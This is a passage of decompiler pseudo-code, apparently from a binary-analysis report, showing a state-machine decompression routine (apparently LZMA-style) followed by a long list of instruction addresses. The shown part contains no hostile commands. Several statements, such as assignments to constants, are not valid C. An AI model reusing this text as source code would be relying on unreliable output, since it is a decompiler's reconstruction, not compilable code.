											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                    0x00000000
                                    0x00407068
                                    0x00407068
                                    0x0040706c
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x004073cb
                                    0x004073cb
                                    0x004073ce
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x004075e5
                                    0x004075ed
                                    0x004075f4
                                    0x004075f6
                                    0x004075fd
                                    0x00407601
                                    0x00407601
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743e
                                    0x00407441
                                    0x00407441
                                    0x00407447
                                    0x00407447
                                    0x00406be3
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x00000000
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x004073cb
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d5f
                                    0x00406d61
                                    0x00406d64
                                    0x00406dd5
                                    0x00406dd8
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x004073cb
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d6d
                                    0x00406d6f
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d87
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9c
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406dac
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcf
                                    0x00000000
                                    0x00406db1
                                    0x00406db1
                                    0x00406db4
                                    0x00406db7
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00000000
                                    0x00406dc8
                                    0x00000000
                                    0x00406ffe
                                    0x00407002
                                    0x00407020
                                    0x00407023
                                    0x0040702a
                                    0x0040702d
                                    0x00407030
                                    0x00407033
                                    0x00407036
                                    0x00407039
                                    0x0040703b
                                    0x00407042
                                    0x00407043
                                    0x00407045
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407053
                                    0x00407004
                                    0x00407007
                                    0x0040700a
                                    0x00407014
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004070ab
                                    0x004070af
                                    0x00000000
                                    0x00000000
                                    0x004070b5
                                    0x004070b9
                                    0x00000000
                                    0x00000000
                                    0x004070bf
                                    0x004070c1
                                    0x004070c5
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x00000000
                                    0x00000000
                                    0x0040711c
                                    0x00407120
                                    0x00407127
                                    0x0040712a
                                    0x0040712d
                                    0x00407137
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x004073cb
                                    0x00407122
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x0040715d
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00407166
                                    0x00407166
                                    0x00407169
                                    0x00407170
                                    0x00407175
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00406df8
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x00000000
                                    0x00407569
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e20
                                    0x00406e23
                                    0x00000000
                                    0x00000000
                                    0x00406e29
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e60
